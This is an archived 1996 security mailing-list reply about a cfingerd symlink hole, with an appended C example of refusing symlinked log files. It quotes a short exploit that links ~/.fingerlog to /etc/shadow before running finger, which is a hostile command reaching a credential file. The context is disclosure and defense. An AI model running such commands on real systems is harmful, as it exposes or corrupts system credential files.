From leitner@leibniz.math.fu-berlin.de  Mon Aug 26 04:41:38 1996
Received: from ki1.chemie.fu-berlin.de (ki1.Chemie.FU-Berlin.DE [160.45.24.21]) by suburbia.net (8.7.4/Proff-950810) with SMTP id EAA04880 for <best-of-security@suburbia.net>; Mon, 26 Aug 1996 04:41:34 +1000
Received: by ki1.chemie.fu-berlin.de (Smail3.1.28.1)
	  from leibniz.math.fu-berlin.de (160.45.40.10) with smtp
	  id <m0uuk6S-0000aCC>; Sun, 25 Aug 96 20:40 MEST
Received: by leibniz.math.fu-berlin.de (/\=-/\ Smail3.1.18.1 #18.14)
	  id <m0uuk6M-00085OC>; Sun, 25 Aug 96 20:40 MET DST
Received: by maddison.math.fu-berlin.de (Smail3.1.29.1)
	  id <m0uuk6L-000JHPC>; Sun, 25 Aug 96 20:40 MET DST
Message-Id: <m0uuk6L-000JHPC@maddison.math.fu-berlin.de>
Date: Sun, 25 Aug 1996 20:40:01 +0200
From: leitner@math.fu-berlin.de (Felix von Leitner)
To: cmatei@lbi.sfos.ro (Matei Conovici ~SysAdm~)
Cc: best-of-security@suburbia.net
Subject: Re: BoS: cfingerd possible security hole
In-Reply-To: <199608251101.NAA01337@lbi.sfos.ro>; from Matei Conovici ~SysAdm~ on Aug 25, 1996 13:01:16 +0200
References: 	<199608251101.NAA01337@lbi.sfos.ro>
X-Mailer: Mutt 0.40
Mime-Version: 1.0

Thus spake Matei Conovici ~SysAdm~ (cmatei@lbi.sfos.ro):

> Exploit:
> Say I'm user joe.
> 
> $ cd ~joe
> $ ln -s /etc/shadow .fingerlog
> $ finger joe@localhost

Let me take this opportunity to spread unsolicited advertisement for my
finger daemon:

  ftp://ftp.prz.tu-berlin.de/pub/unix/security/ffingerd

It comes with autoconf support, is supposed to run as nobody, does
paranoid syslogging and does not allow @host queries and symlinks as
.forward.  It does not give away things like the users' shell and home
directory.

Felix
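
Added example (not part of the original message and not ffingerd's code): one way a daemon could refuse the symlinked .fingerlog from the quoted report before writing to a per-user file. The names open_user_log and demo and the scratch paths are assumptions made for illustration.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: open `name` inside `dir` for appending, only if it is
 * a plain file. O_NOFOLLOW fails the open when `name` is a symlink; fstat()
 * on the descriptor (not the path) avoids a check/use race and also rejects
 * FIFOs, devices and hard-linked files. O_NONBLOCK keeps a FIFO from hanging. */
int open_user_log(const char *dir, const char *name)
{
    struct stat st;
    int dfd = open(dir, O_RDONLY | O_DIRECTORY);
    if (dfd < 0) return -1;
    int fd = openat(dfd, name, O_WRONLY | O_APPEND | O_NOFOLLOW | O_NONBLOCK);
    close(dfd);
    if (fd < 0) return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed check in a scratch directory: "target" stands in for a
 * protected file, ".fingerlog" is a symlink to it.
 * Returns 1 when the symlink is refused and the plain file is accepted. */
int demo(void)
{
    char home[] = "/tmp/fingerdemoXXXXXX", lnk[64], target[64];
    if (!mkdtemp(home)) return -1;
    snprintf(target, sizeof target, "%s/target", home);
    snprintf(lnk, sizeof lnk, "%s/.fingerlog", home);
    int t = open(target, O_WRONLY | O_CREAT, 0600);
    if (t < 0 || close(t) != 0 || symlink("target", lnk) != 0) return -1;
    int via_link = open_user_log(home, ".fingerlog");
    int plain = open_user_log(home, "target");
    if (plain >= 0) close(plain);
    unlink(lnk); unlink(target); rmdir(home);
    return via_link < 0 && plain >= 0;
}

int main(void)
{
    return demo() == 1 ? 0 : 1;
}
```

This covers only the symlink check; running the daemon as an unprivileged user, as the message describes, is a separate measure.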

